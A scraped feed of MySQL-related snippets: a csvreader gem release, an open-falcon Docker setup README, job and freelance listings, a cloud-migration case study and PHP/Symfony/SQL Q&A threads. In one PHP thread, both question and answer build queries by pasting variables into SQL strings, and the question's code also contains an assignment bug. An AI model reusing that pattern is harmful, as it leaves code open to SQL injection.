
          csvreader v1.0 - read comma-separated values (csv) the right way (incl. hash, ...)
Hello, I’ve uploaded version 1.0 of the new csvreader library / gem, which lets you read tabular data in the comma-separated values (CSV) format the right way :-). The basic methods such as Csv.read or CsvHash.read follow best practices out of the box with zero configuration. Under the hood the library includes purpose-built “backend” parsers (e.g. ParserStd, ParserStrict, ParserTab, etc.), so you can handle all the popular CSV formats / dialects, such as MySQL exports (use Csv.mysql.read) or PostgreSQL exports (use Csv.postgres.read) and more, including unix-style escapes and \N or unquoted empty values for null/nil. Data is the new gold :-) Happy data / gold mining with the new csvreader library / gem (in Ruby). Cheers. Prost. PS: What’s wrong (broken) in the standard csv library? See the “let’s count the ways” article series.

          Atomic Transactional Replacement of a Table in MySQL
Even with AUTOCOMMIT off, a DROP TABLE or CREATE TABLE statement causes an implicit commit in MySQL. So if you drop your table of (say) aggregated data and then create a new one, even though you are theoretically in a transaction there will be a window of time when clients of the database see no table, and a window …
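The usual workaround is to build the replacement table under a scratch name and swap it in with a single RENAME TABLE statement, which swaps the names atomically (it still implicitly commits, but clients never observe a missing table). A sketch, with illustrative table names:

```sql
-- Build the replacement next to the live table.
CREATE TABLE aggregated_new LIKE aggregated;
INSERT INTO aggregated_new
SELECT ...;                        -- repopulate the aggregate here

-- One atomic swap: readers see either the old table or the new one,
-- never no table at all.
RENAME TABLE aggregated     TO aggregated_old,
             aggregated_new TO aggregated;

DROP TABLE aggregated_old;
```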
          A universal RESTful API for a DBMS in Node.js
Problem statement: there is a server with a DBMS, for example MySQL. To manage the data in its tables, a complete RESTful API has to be implemented in Node.js for each table: POST: create a new record; PUT: edit the record with a given id; GET: fetch all records; GET: fetch the record with a given id; DELETE: delete the record with a given id. There is a lot more […]
          Display certain records from year field (integer)
Forum: MySQL Posted By: docock Post Time: Oct 7th, 2018 at 03:59 PM
          Displaying MySQL data in two different divs help
Forum: PHP Posted By: joshm101 Post Time: Oct 7th, 2018 at 06:09 AM
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Querying MySQL’s INFORMATION_SCHEMA: Why? How?
Databases need to run optimally, but that is no easy task. The INFORMATION_SCHEMA database can be your secret weapon in the war of database optimization.
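For example, one common tuning query pulls the largest tables by data plus index size straight out of INFORMATION_SCHEMA (a sketch; the reported sizes are approximate for InnoDB):

```sql
SELECT table_schema,
       table_name,
       ROUND((data_length + index_length) / 1024 / 1024, 1) AS total_mb
FROM   information_schema.tables
WHERE  table_schema NOT IN
       ('mysql', 'information_schema', 'performance_schema', 'sys')
ORDER  BY data_length + index_length DESC
LIMIT  10;
```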
          Migration Developer (PHP, MySQL) - Vanilla Forums, Inc. - Montréal, QC
We offer a casual work environment, health benefits, Mac gear, free snacks and a job that you’ll love!...
From Indeed - Tue, 09 Oct 2018 18:46:53 GMT - View all Montréal, QC jobs
          Technical Architect (Salesforce experience required) Casper - Silverline Jobs - Casper, WY
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. BA/BS in Computer Science, Mathematics, Engineering, or similar technical degree or...
From Silverline Jobs - Sat, 23 Jun 2018 06:15:28 GMT - View all Casper, WY jobs
          falcon-plus/README.md at master · open-falcon/falcon-plus · GitHub

Running the open-falcon container

The latest version on Docker Hub is v0.2.1.

1. Start MySQL and initialize the MySQL tables before the first run
    ## start mysql in container
    docker run -itd \
        --name falcon-mysql \
        -v /home/work/mysql-data:/var/lib/mysql \
        -e MYSQL_ROOT_PASSWORD=test123456 \
        -p 3306:3306 \
        mysql:5.7

    ## init mysql tables before the first run
    cd /tmp && \
    git clone https://github.com/open-falcon/falcon-plus && \
    cd /tmp/falcon-plus/ && \
    for x in `ls ./scripts/mysql/db_schema/*.sql`; do
        echo init mysql table $x ...;
        docker exec -i falcon-mysql mysql -uroot -ptest123456 < $x;
    done

    rm -rf /tmp/falcon-plus/
2. Start Redis in a container
    docker run --name falcon-redis -p 6379:6379 -d redis:4-alpine3.8
3. Start falcon-plus modules in one container
    ## pull images from hub.docker.com/openfalcon
    docker pull openfalcon/falcon-plus:v0.2.1
    
    ## run falcon-plus container
    docker run -itd --name falcon-plus \
         --link=falcon-mysql:db.falcon \
         --link=falcon-redis:redis.falcon \
         -p 8433:8433 \
         -p 8080:8080 \
         -e MYSQL_PORT=root:test123456@tcp\(db.falcon:3306\) \
         -e REDIS_PORT=redis.falcon:6379  \
         -v /home/work/open-falcon/data:/open-falcon/data \
         -v /home/work/open-falcon/logs:/open-falcon/logs \
         openfalcon/falcon-plus:v0.2.1
    
    ## start falcon backend modules, such as graph,api,etc.
    docker exec falcon-plus sh ctrl.sh start \
            graph hbs judge transfer nodata aggregator agent gateway api alarm
    
    ## or you can just start/stop/restart specific module as: 
    docker exec falcon-plus sh ctrl.sh start/stop/restart xxx

    ## check status of backend modules
    docker exec falcon-plus ./open-falcon check
    
    ## or you can check logs at /home/work/open-falcon/logs/ in your host
    ls -l /home/work/open-falcon/logs/
    
4. Start falcon-dashboard in container
    docker run -itd --name falcon-dashboard \
        -p 8081:8081 \
        --link=falcon-mysql:db.falcon \
        --link=falcon-plus:api.falcon \
        -e API_ADDR=http://api.falcon:8080/api/v1 \
        -e PORTAL_DB_HOST=db.falcon \
        -e PORTAL_DB_PORT=3306 \
        -e PORTAL_DB_USER=root \
        -e PORTAL_DB_PASS=test123456 \
        -e PORTAL_DB_NAME=falcon_portal \
        -e ALARM_DB_HOST=db.falcon \
        -e ALARM_DB_PORT=3306 \
        -e ALARM_DB_USER=root \
        -e ALARM_DB_PASS=test123456 \
        -e ALARM_DB_NAME=alarms \
        -w /open-falcon/dashboard openfalcon/falcon-dashboard:v0.2.1  \
       './control startfg'

Building open-falcon images from source code

Building falcon-plus
    cd /tmp && \
    git clone https://github.com/open-falcon/falcon-plus && \
    cd /tmp/falcon-plus/ && \
    docker build -t falcon-plus:v0.2.1 .
Building falcon-dashboard
    cd /tmp && \
    git clone https://github.com/open-falcon/dashboard  && \
    cd /tmp/dashboard/ && \
    docker build -t falcon-dashboard:v0.2.1 .

          Need my Prestashop offline payment module updated (error 500)
I need this module fixed and a few options added; the module stopped working with the new site, since it was built for a previous version. I want to incorporate this option and a few more. We can work here and via Skype/Dropbox/email/phone; speaking Spanish is also a good option... (Budget: $30 - $250 USD, Jobs: eCommerce, HTML, MySQL, PHP, Prestashop)
          How to teach MySQL to look into the past

This article is about logging data changes in MySQL. I want to show a trigger-based logging implementation and the surprising things you can then do with it.

Why triggers? Because there is no access to the binary log. A binlog-based implementation is potentially faster, though also harder to build, since the log has to be parsed.

A warning up front: this method puts additional load on the server. If your data changes very actively, this solution may not suit you, or it will need some adjustments and rework.

On the whole, though, the solution is complete and comprehensive. It can be deployed as-is and will do its job well.
Read more →
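The core of the trigger approach is an AFTER trigger per audited operation that copies the old and new values into a history table. A minimal sketch for one table (the names and columns are illustrative, not the article's full solution):

```sql
CREATE TABLE product_history (
  id         INT AUTO_INCREMENT PRIMARY KEY,
  product_id INT NOT NULL,
  old_price  DECIMAL(10,2),
  new_price  DECIMAL(10,2),
  changed_at TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP
);

DELIMITER //
CREATE TRIGGER product_au
AFTER UPDATE ON product
FOR EACH ROW
BEGIN
  INSERT INTO product_history (product_id, old_price, new_price)
  VALUES (OLD.id, OLD.price, NEW.price);
END//
DELIMITER ;
```

With the history table in place, "looking into the past" becomes an ordinary query against product_history filtered by changed_at.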
          The records are not updating

The records are not updating

Reply to: The records are not updating

Hello: I have worked with MySQL and have no experience at all with SQL Server. In any case, I see that you have added idproducto as an output parameter:
...
ParIdproducto.Direction = ParameterDirection.Output;
....
Perhaps you overlooked that, and that is the problem. Or perhaps you are using a return 1 for when the update succeeds but have the product id as an output. Either way, I don't know SQL Server, and in MySQL I only work with input parameters.

Posted on October 9, 2018 by Fabricio

          Need Email Server Expert
I have a Sendy license and need help with a few things, including updating the version, setting a cron job and general maintenance issues that come up from time to time. I'm looking for someone who has... (Budget: $5 - $15 USD, Jobs: Email Marketing, Interspire, Mailwizz, MySQL, System Admin)
          Laravel expert
We have a site that needs some changes: 1) split the admin panel onto one domain and the frontend onto another. For example: login.com will be the login area and admin panel, and website.com will show the results... (Budget: $200 - $455 USD, Jobs: Laravel, MySQL, PHP, Software Architecture, Website Design)
          Database Architect with NoSQL, MySQL and Python
TX-Austin, Hi, greetings, hope you are doing great. Please find the job description below and reply with your updated resume ASAP. Title: Data Architect. Location: Austin, TX. Duration: 12+ months contract. Required qualifications: 12+ years of experience as a data developer for web-based large-scale enterprise applications. Developed and supported large-scale enterprise databases in production based on SQL (Mar
          Mulesoft developer
IN-Indianapolis, Position: Mulesoft Developer. Location: Indianapolis, IN. Duration: long-term contract. Mulesoft Consultant with 10+ years of experience. Mule Batch, JMS, CXF Web Services, SOAP and REST Web Services, Java, MySQL, Mule ESB, Anypoint Studio, Mule server 3.8.0, MMC, Jenkins, JIRA, Confluence, Kibana, GitHub, ForgeRock, Java 8, Spring, MUnit, ActiveMQ
          How we ran a digital transformation project, or On understanding the client

I probably won't reveal a great secret if I say: when you are promised that a project is simple and that you will quietly finish it in three months, don't believe it. Better to multiply the estimates by 3-5. Stock up on coffee by the decaliter. Arm yourself with patience. Prepare for adventures with the documentation. If the promises come true, you simply get to rest earlier. If not, you will be morally hardened.

So: I work as a System Architect at EPAM Ukraine. We recently successfully completed a digital transformation project for a Dutch company. As you have probably guessed from the previous paragraph, "successfully" does not mean "simply". Here is how we helped transform a business and mixed DevOps best practices with the art of communication.

Backstory

Our customer is a B2B supplier of full-featured meteorological solutions. Put simply, they sell processed meteorological data, including the pretty pictures we later see in TV weather forecasts.

At first there were three different companies in three different countries. Then the Dutch company took the other two under its wing, and in doing so created a problem for the future: the parent company did not rebuild the infrastructure of its acquisitions and left it, and the people, as they were. The newly formed holding came to resemble a patchwork quilt in which every piece did its own thing and was attached to the others with coarse stitches. This naturally caused many data-migration problems, in particular with the Swiss company that later came to us as a project.

The system of the division responsible for collecting meteorological data is very complex. Raw data enters their infrastructure from five streams at once. Three different databases, for instance, were wired to one piece of software, which in turn was wired to another.

The division's data center processes the raw data and splits it into two separate products: data with images and animation that is sold to clients, and weather-forecast video. On top of that there are the readings coming from satellites and weather stations.

The thing is, even after the legal merger this sub-company kept living its own life. It hosted its infrastructure in a data center literally across the street from the office, at an insane price: the ISP alone cost the company hundreds of thousands of euros, and the monthly fee ran to tens of thousands of euros plus additional support costs.

Life in a newly formed holding is turbulent, but business is business. Our future customer decided it wanted not merely to sell meteorological data but to build great products on top of it, for example refining and hyper-localizing forecasts down to a grid of roughly 2 by 2 km. Before taking on innovation, however, it had to secure the rear and put the back end in order. To that end the customer's CTO launched a Cost Saving program whose goal was to move to the cloud, abandon the infrastructure scattered across various data centers, and save a few hundred thousand dollars a year. And it was to be not just a move but a proper optimization. With that task they came to EPAM.

Unpleasant surprises

The project came to me marked urgent. Preliminary agreements with the client were already in place; all that remained was to dot the i's and start working.

Initially three months were allotted to the project. I went to the customer, and their CTO immediately reassured me: "Don't worry, our case is simple. There is an expensive data center in Switzerland, and we need to quickly move everything in it to the cloud and cut costs." He called it "shift & lift". I was glad, but said: "Let's take a look." And I started looking.

That is when the surprises began.

For reasons unknown to us, stakeholders began leaving the Swiss data center where they worked and where a piece of the company was housed. The CTO left too, replaced by a new person who was still taking over the reins. Moving the infrastructure without testing was impossible. The promised "shift & lift" remained a dream of mine: there were fewer and fewer people who could tell us anything. On top of that, a whole bouquet of old hardware, legacy systems, and legacy decisions awaited us.

Having assessed the situation, I realized we would not fit into three months. I assembled a team of 7. Piece by small piece we gathered information about how the infrastructure was organized and built a partial map of it. But we ran into one big problem: monolithicity. Switch off one service, and all the others die.

To understand what was going on with the services, we had to figure out where to start. We circled for a long time, took snapshots of all the existing machines, and tried to grasp what ran inside them and how, but in vain. The people who could explain anything were either quitting, on vacation, or barely answering.

We realized no help was coming from anywhere. We had to do full reverse engineering.

Breaking through walls

The human factor gave us the most fun. Because the company had officially announced the digital transformation our project was part of, people assumed they would simply be fired when it ended. Although that was not actually the case, we ran into speed bumps everywhere.

The client had a great deal of legacy stuff that had never been migrated to the cloud or automated. The team that handled the data flow and sat on all this legacy understood perfectly well that we could automate everything they were doing by hand, and that they would then become simply unnecessary, even though we had no such plans.

With the operations team there were other nuances. Some people there had worked for many years and were not keen to move to the new Amazon technology stack, because they were not particularly familiar with it. A few machines in their data center ran an old Oracle, and they did not want to migrate it to Amazon in full. Let it stay as it is, they said. The reason: "just because."

We met this kind of resistance in nearly every department until we showed how everything runs automatically after migration. In the end that worked with every group.

There was another reason: a separate vendor existed whose sole job was supporting Oracle. The customer handed them instructions on what had to be done to move Oracle. In practice we did everything ourselves: prepared the machine, set it up, created all the rules in Amazon. The only thing the vendor's people did was install Oracle and move the data across. The correspondence with the vendor, all the explaining and persuading, cost us about four months in total.

The last wall we broke through with our foreheads right at the end, when the project had to be extended so it could be finished and handed over properly. For that we were given one more piece of infrastructure, called broadcasting: images are layered on top of one another and, fed by the data, a complete weather forecast is drawn. At this stage the project looked cloudless and we were optimistic. We expected no problems, because we were talking to a knowledge keeper who willingly shared information and promised to hand over all the necessary data soon.

Our optimism soon faded. The knowledge keeper turned into the elusive Joe, and we never received the promised data. Our team tried approaching from different sides to obtain the missing information, but our attempts were crushed by the customer's overload. As a result we missed deadlines. In the end we handed this part of the project over essentially ready for all practical purposes, but not fully switched over to production.

Funny enough, here we met the Oracle vendor again. Even though we had already "beaten" them once, history repeated itself. Imagine an e-mail thread 4-5 monitors long (collapsed). That was the dialogue we had over one small matter. But we are patient people; we understood we were dealing with different individuals, and slowly but surely we kept everything moving.

3 -> 6 -> 15

We split the team into layers: some handled scripts, some the data, some the flows. To cover the risks at least within our own team, we held internal sessions where we shared with one another who knew what and how things worked, and we documented everything. That let us cover for each other when someone went on vacation or was away for family reasons.

Eventually we found where the data was going, and from that thread our "investigation" began. Since the company earns its money supplying consolidated, processed data, our team concentrated on the data flow. At this stage it was very important to show the client that we had the expertise and could figure it out (incidentally, thanks to that experience our team was half the size usually assembled for such projects).

Once we had fully mapped the network topology and what was going on in their Swiss data center, the client believed in us.

I said from the start that it would not be simple and would take at least a year. I always gave updates and attended the client's transformation meetings, telling everything as it was. That is why the project kept being extended: the initial contract was extended to half a year, and then by another half year at once.

Technology

For Infrastructure-as-Code we used SparkleFormation; for automated provisioning (CM), Puppet, because it was already present, although it was only used for creating users and had not been built out to the point where it could be used fully.

For monitoring we used Icinga. For tracking backlog cards, Trello, plus Confluence for storing data and for knowledge transfer. For deployments, Jenkins and Bamboo. Their databases were MySQL, which we moved to Amazon RDS. There was also Oracle, which we likewise moved and automated (not without adventures, as I mentioned above).

Results

The project finished in August. We switched everything over to Amazon infrastructure and automated it all following DevOps best practices. We did full reverse engineering down to the library level, moved over to AWS, introduced a modern technology pipeline, and reduced the infrastructure risks. We made it work the way the customer originally wanted: with one button the whole infrastructure (or part of it) comes up or goes down. We left behind a disaster recovery plan, documented everything, and held knowledge transfer sessions.

As I said above, the company was paying tens of thousands of euros a month for the old data center, plus additional resources for support. Half a year after going to production the client will begin to recoup the investment. We managed to cut costs fourfold, and the client also forgot the headache of manual work.

Our whole team played a huge role in this project. Working together as one well-coordinated mechanism is what made the results I am describing possible. It is no great secret that a team also has to be worked on: create comfortable conditions, share knowledge, give everyone a full picture of the situation, support and motivate. The same has to be built into the relationship with the client. In our situation it was very important to find mutual understanding with the client, and at the beginning that was rather hard. They watched us, kept silent, said: "Well, maybe." We had to show results, and very good ones.

One main takeaway

You have to understand the client.

Here are three pieces of advice on working with clients that I took away from this project:

1. Put yourself in the client's place

Specifically, you need to understand the client representative you work with directly, your own point of contact. To build a communication bridge with them, look into their professional desires and fears. And for the full picture, talk to the people who work at the company. It may sound banal, but sometimes banalities simply have to be observed: a sort of communication discipline that, in my experience, has never hurt any team.

2. Study the client's business and watch for changes

You need to understand all of the company's processes in order to understand why things turned out the way they did, who is responsible, and what to do. Sometimes you have to take in much wider areas: for example, the company's global market position, its stock, recent deals, the overall news landscape. This can hint at which levers will produce results right now.

3. Integrate into the client's team as much as possible

To understand what was happening with the client company, I talked to the various managers connected with the account. I asked around, found the loose ends, built the chains. I talked to the delivery manager, who gave many hints about how to talk to whom, who was approachable and who was not. I talked to the neighboring support team and pulled them in, to motivate them and make things livelier for them. To be completely honest, from the start we tried to account for the risks of the moment we would finish the project. And so it turned out: we left, and the knowledge keepers stayed, because they had been involved in the process.

Finally, let me stress: communication skills help a great deal. You need to think, develop, and look wider. That is desirable if you plan to grow professionally, and absolutely necessary if you already hold a coordinating role in a team or project. In that case, all the threads must be in your fist.


           ORACLE Information InDepth MySQL Edition newsletter published
The new ORACLE Information InDepth MySQL Edition newsletter has been published.

More:
https://www.oracle.com/a/ocom/docs/dc/em/nsl100749618-ww-ww-nl-cnl1-nsl1-ev.html?elq_mid=124914&sh=2419091808071826130709182225291704101833&cmid=MSQL180904P00021
          Build me a website
Need a complete web application that will run on our company's intranet. Requirements: - Login panel - Forms - Generate PDFs as soon as forms are submitted. Connect for further details. (Budget: ₹37500 - ₹75000 INR, Jobs: Django, Laravel, MySQL, node.js, PHP)
          Emails being sent to customers who are in the MySQL database?

How do you set it up so that emails get sent automatically to customers at certain intervals (GDPR allowing)?

Their names and addresses would have been entered into the SQL database when they signed up as customers.

Also, how do I add names and addresses to that SQL database manually, please?
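A common setup is a cron job that periodically runs a query like the following and sends mail to whoever it returns. The column names here (marketing_consent, last_emailed_at, and so on) are illustrative assumptions, not a known schema:

```sql
-- Customers due for a mailing: consented, and not emailed
-- in the last 30 days (or never).
SELECT id, name, email
FROM   customers
WHERE  marketing_consent = 1
  AND (last_emailed_at IS NULL
       OR last_emailed_at < NOW() - INTERVAL 30 DAY);

-- Adding a customer to the same table by hand:
INSERT INTO customers (name, email, marketing_consent)
VALUES ('Jane Example', 'jane@example.com', 1);
```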


          restore website from archive
I lost my whole website and had to use static-page scraping from the Wayback Machine; I need help. (Budget: $10 - $30 USD, Jobs: HTML, MySQL, PHP, Web Scraping, Website Design)
          Analytics Architect - GoDaddy - Kirkland, WA
Implementation and tuning experience in the big data Ecosystem (Amazon EMR, Hadoop, Spark, R, Presto, Hive), database (Oracle, mysql, postgres, Microsoft SQL...
From GoDaddy - Tue, 07 Aug 2018 03:04:25 GMT - View all Kirkland, WA jobs
          Migrate and configure for google cloud server + Optimize the speed of the site through the code.
1 - Migrate and configure for google cloud server. 2 - Optimize the speed of the site through the code. (Budget: $30 - $250 USD, Jobs: CSS3, Javascript, MySQL, PHP, WordPress)
          MySQL SUM function
It is said that if the column is a floating-point type, SUM can return a result with many decimal places. But in my tests, when the column has a declared precision such as DOUBLE(12,2), no matter how I SUM I never get a result with more than two decimal places, like 12.2222266; it is always 12.22. Or does this out-of-precision case occur only at random?
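The short answer is that it is not random: DOUBLE(12,2) makes MySQL round values to two decimals on storage, so small sums usually come out clean, whereas a bare FLOAT/DOUBLE column exposes binary floating-point error. It still does not guarantee exactness (and the (M,D) float syntax is deprecated); when the sum must be exact, the usual advice is DECIMAL, or an explicit ROUND. A sketch:

```sql
-- DECIMAL stores exact scaled values, so SUM is exact:
CREATE TABLE amounts (v DECIMAL(12,2));
INSERT INTO amounts VALUES (0.10), (0.20), (0.30);
SELECT SUM(v) FROM amounts;

-- Over a plain FLOAT/DOUBLE column, trim the binary error explicitly
-- (float_amounts is a hypothetical table):
SELECT ROUND(SUM(v), 2) FROM float_amounts;
```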
          How should this MySQL statement be written?
mysql> select * from tt;
+----------+------------+----------+
| dt       | r          | w        |
+----------+------------+----------+
| 20180919 | 1208500446 | 13692646 |
| 20180920 | 1211483781 | 13745692 |
| 20180921 | 1214659790 | 14949026 |
| 20180922 | 1217073551 | 14980971 |
...
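The question is truncated, but r and w look like cumulative daily counters, so the usual task here is day-over-day deltas. On MySQL 8.0 that is one window function (a sketch under that assumption):

```sql
SELECT dt,
       r - LAG(r) OVER (ORDER BY dt) AS r_delta,
       w - LAG(w) OVER (ORDER BY dt) AS w_delta
FROM   tt;
```

On older versions the same result can be obtained by self-joining each row to the previous day's row.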
          Is it considered a bad practice to add fields to the Symfony entity in the contr ...

Is it considered a bad practice to add fields to a Symfony entity in the controller? For example, let's say that I have a simple entity:

    /**
     * @ORM\Entity
     * @ORM\Table(name="user")
     */
    class User extends BaseUser
    {
        /**
         * @ORM\Id
         * @ORM\Column(type="integer")
         * @ORM\GeneratedValue(strategy="AUTO")
         */
        protected $id;

        public function __construct()
        {
            parent::__construct();
        }

        public function getId()
        {
            return $this->id;
        }

        public function setId($id)
        {
            $this->id = $id;
        }
    }

And then in UserController.php I want to do the following:

    foreach ($users as $user) {
        $user->postsCount = someMethodThatWillCountPosts();
    }

So that later postsCount can be displayed in Twig. Is it a bad practice?

Edit:

It's important to count the posts on the MySQL side; there will be more than 50,000 elements to count for each user.
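On the MySQL side, counting for all users at once is a single grouped query rather than a per-user call; a sketch assuming a post table with a user_id column:

```sql
SELECT u.id, COUNT(p.id) AS posts_count
FROM   user u
LEFT   JOIN post p ON p.user_id = u.id
GROUP  BY u.id;
```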

Edit2:

Please note that this question is not about a particular problem but rather about good and bad practices in object-oriented programming in Symfony.

"rather about good and bad practices in object oriented programming"

If that's the case then you really shouldn't have any business logic in the controller; you should move it into services.

So if you need to do something with entities before passing them to the Twig template, you might want to do that in a specific service, or have a custom repository class that does it (maybe using some other service class) before returning the results.

i.e. your controller's action could then look more like this:

    public function someAction()
    {
        // using a custom repository
        $users = $this->usersRepo->getWithPostCount();

        // or using some other service
        // $users = $this->usersFormatter->getWithPostCount($x);

        return $this->render('SomeBundle:Default:index.html.twig', [
            'users' => $users,
        ]);
    }

It's really up to you how you do it; the main point is that best practices discourage keeping any business logic in the controller. Just imagine you need to do the same thing in another controller, or in yet another service: if you don't encapsulate it in its own service, you'll have to write it every single time.

btw. have a read there: http://symfony.com/doc/current/best_practices/index.html


          The result of MySQL results in the php table
Print the php table with the print function via the printer

I have the following php table, how do i add print functionality just to the php table? And a button that when clicked, the following table is printed via printer, I tried 'CTRL+P' and I only got the html section of the page, for example the header, footer

Read the results of a PHP table, in real time with javascript

I certainly can't solve this problem by myself after a few many days already trying. This is the problem: We need to display information on the screen (HTML) that is being generated in real time inside a PHP file. The PHP is performing a very active

In the php table, retrieve all rows from the mysql database in the single td table?

in php array fetch all rows from mysql database and all values are showing into the single table td? i Want results like this? 1) Small 2) Large 3) Medium now problem is that all values displaying into single table td i want to display all of these va

mysql-query other condition of the PHP table

I have this table in mysql called safespot +---------+---------------+ | term_id | userid | safe | +---------+--------|------+ | 1 | 1 | large number, unix timestamp here | 1 | 2 | large number, unix timestamp here | 1 | 3 | large number, unix timest

layout of the grid of the php table

I wanted to fetch data inside PHP table in grid layout. So I made this code. I don't know what went wrong or if I am missing something. I wanted the table to have three columns but it shows the table in a single column. Any help will be appreciated.

to sort the data of the line in the PHP table?

i have a table being echo'd from a single query to a table in our database and i get it to echo out the following table; http://www.skulldogs.com/dev/testview.php i want it to sort the "yellow" rows under the correct green rows where the "m

Change the php table when the user check a box

I have a column that has a button that when pressed, links to a URL set in PHP. I want to add a checkbox next to that button so that if it's checked when a user presses the button, it will take them to an alternate url. The PHP code setting the url:

Sum of columns in the PHP table

I have an index.php with various SQL queries which helps me find the balances of the respective accounts. This is a TRIAL BALANCE so I need to SUM all the amount in the Debit Column and SUM all the amount in the Credit Column so that I can Tally both

Mysql Query with two php tables

I was wondering how to do a query with two tables in php? I have this single query ?php $sQuery = "Select * From tb_columnas Where col_Status='activo' Order by col_ID DESC"; $result = mysql_query($sQuery, $cnxMySQL) or die(mysql_error()); $rows_

How to extract specific data from the MySQL database to my PHP table?

I want to fetch data from MySQL database to my table in .php file. In every row of my table I want to display title, text and attachment($name) that user can download. The problem is when I display that, I get all attachments from database shown in l

Adding the DateDiff column to the PHP table using MySQLI

I'm trying to add a column to my database table that shows the difference between the timestamp and the current date. I've tried creating another query using DateDiff, but I'm not sure exactly what I'm doing wrong. Can anyone help? My code is below.

The data output of the PHP table does not maintain the structure

So I have a mySQL database, and I'm using PHP to grab it and display it in a HTML table. It's set up like this: <table> <tr> <td>Title 1</td> <td>Title 2</td> </tr> <?php $i=0; while ($i < $num) { $col1=mysq

Show columns with rows in the php table

Hey guys I need your help, I have this table and I want to shows like this FIDDLE, really I don't know how to do this because sometimes just exist two columns(prov_name ) and sometimes exist more that two rows please help me if you can ! Hope you und

Automatically generate field names from the PHP table

There is a problem of automatically retrieving field names from a MySQL table. If possible could the name be placed in this format along with the dynamically created text box? : The codes that I have created so far are located below: <?php include &quo


          MySql / PHP SUM 2 tables 1 query      Cache   Translate Page      

I have been having the most difficult time ever with this problem. I have 2 tables with total columns that I want to SUM together. They both have the same columns, I am using two tables as one is a script generated table of data and the other is user entered data and we need them separate. Except now we need to SUM(total) them together.

Table 1
+------------+------+--------+--------+
| date       | t_id | t_port | total  |
+------------+------+--------+--------+
| 2012-04-01 | 1271 | 101    |  80.00 |
+------------+------+--------+--------+

Table 2
+------------+------+--------+--------+
| date       | t_id | t_port | total  |
+------------+------+--------+--------+
| 2012-04-20 | 1271 | 101    | 120.00 |
+------------+------+--------+--------+

Total should be $200.00

HERE IS MY QUERY

"SELECT SUM(cntTotal) as total FROM CBS_WO
 WHERE (date BETWEEN '$monthSecond' AND '$monthEnd')
   AND t_port = '$t_port' AND t_id = '$t_id'
 UNION
 SELECT SUM(cntTotal) as total FROM CNT_MODS
 WHERE (date BETWEEN '$monthSecond' AND '$monthEnd')
   AND t_port = '$t_port' AND t_id = '$t_id'"

This query seems to work in phpMyAdmin as I get 2 rows (1 for each table), so logically I used a WHILE loop in PHP to add the two rows together. After echo'ing out each row manually I discovered my second row isn't showing up in the loop, yet it does in the query?

Can't figure out why this is happening. I am certain it's something silly but I've been at this code for over 16 hrs already and need a new set of eyes.

PHP CODE

function periodTotal() {
    include('/sql.login.php');

    $t_id   = "1271";
    $t_port = "101";
    $date   = date("Y-m-d");

    # FIND MONTH (DATE)
    $monthStart  = date("Y-m-d", strtotime(date('m').'/01/'.date('Y').' 00:00:00'));
    $monthFirst  = date("Y-m-d", strtotime('-1 second', strtotime('+15 days', strtotime(date('m').'/01/'.date('Y').' 00:00:00'))));
    $monthSecond = date("Y-m-d", strtotime('-1 second', strtotime('+16 days', strtotime(date('m').'/01/'.date('Y').' 00:00:00'))));
    $monthEnd    = date("Y-m-d", strtotime('-1 second', strtotime('+1 month', strtotime(date('m').'/01/'.date('Y').' 00:00:00'))));

    if ($date = $monthFirst) {
        $sql = $dbh->prepare("SELECT SUM(cntTotal) as total FROM CBS_WO WHERE (date BETWEEN '$monthStart' AND '$monthFirst') AND t_port = '$t_port' AND t_id = '$t_id' UNION SELECT SUM(cntTotal) as total FROM CNT_MODS WHERE (date BETWEEN '$monthStart' AND '$monthFirst') AND t_port = '$t_port' AND t_id = '$t_id'");
        $sql->execute();
    } else {
        $sql = $dbh->prepare("SELECT SUM(cntTotal) as total FROM CBS_WO WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id' UNION SELECT SUM(cntTotal) as total FROM CNT_MODS WHERE (date BETWEEN '$monthSecond' AND '$monthEnd') AND t_port = '$t_port' AND t_id = '$t_id'");
        $sql->execute();
    }

    while ($row = $sql->fetch(PDO::FETCH_ASSOC)) {
        $total += $row['total'];
    }

    return $total;
}

Does this work for you?

SELECT SUM(`total`) as `total` FROM (
    ( SELECT SUM(cntTotal) as total FROM CBS_WO
      WHERE (date BETWEEN '$monthSecond' AND '$monthEnd')
        AND t_port = '$t_port' AND t_id = '$t_id' )
    UNION
    ( SELECT SUM(cntTotal) as total FROM CNT_MODS
      WHERE (date BETWEEN '$monthSecond' AND '$monthEnd')
        AND t_port = '$t_port' AND t_id = '$t_id' )
) as temp

This might be more efficient:

SELECT SUM(cntTotal) as total FROM (
    ( SELECT cntTotal FROM CBS_WO
      WHERE (date BETWEEN '$monthSecond' AND '$monthEnd')
        AND t_port = '$t_port' AND t_id = '$t_id' )
    UNION ALL
    ( SELECT cntTotal FROM CNT_MODS
      WHERE (date BETWEEN '$monthSecond' AND '$monthEnd')
        AND t_port = '$t_port' AND t_id = '$t_id' )
) as temp

(only has one SUM) but you'd have to test it. Note that when summing raw rows like this you want UNION ALL rather than UNION, otherwise identical rows coming from the two tables would be collapsed into one before the SUM.


          Shifting Moodle to AWS from VPS (CPanel)      Cache   Translate Page      
Hi, I have upload speed issue with Moodle application. Just wanted to shift on AWS ASAP. Thanks (Budget: $8 - $15 AUD, Jobs: Amazon Web Services, Linux, Moodle, MySQL, System Admin)
          Tableau Developer      Cache   Translate Page      
CA-Redwood City, Redwood City, California Skills : Tableau, SSRS development, Data visualization, SQL Server, Redshift, Athena, MySQL and Analytics Description : Required Qualifications: • 5-7 years of development experience in Tableau • 3-4 years of development experience in Tableau and SSRS development. • 2+ years of experience with BI UX design. • 2+ years of experience with Analytics. • Experience with data vi
          Web Marketing Specialist II      Cache   Translate Page      
AZ-Phoenix, Web Marketing Specialist II for Axway, Inc. (Phoenix, AZ) Responsible for app engg mngmnt & maintenance of marketing automation platforms. Reqs Bach in Info Tech, Comp Info Sys, Bus or rltd. Reqs 3 yrs of post-Bach exp which must include some exp w/: Web front-end develmnt using HTML, CSS, Javascript, JQuery; Web back-end develmnt using PHP, MySQL, Git; Responsive Web Design; troubleshooting or mo
          Inventory stock management system       Cache   Translate Page      
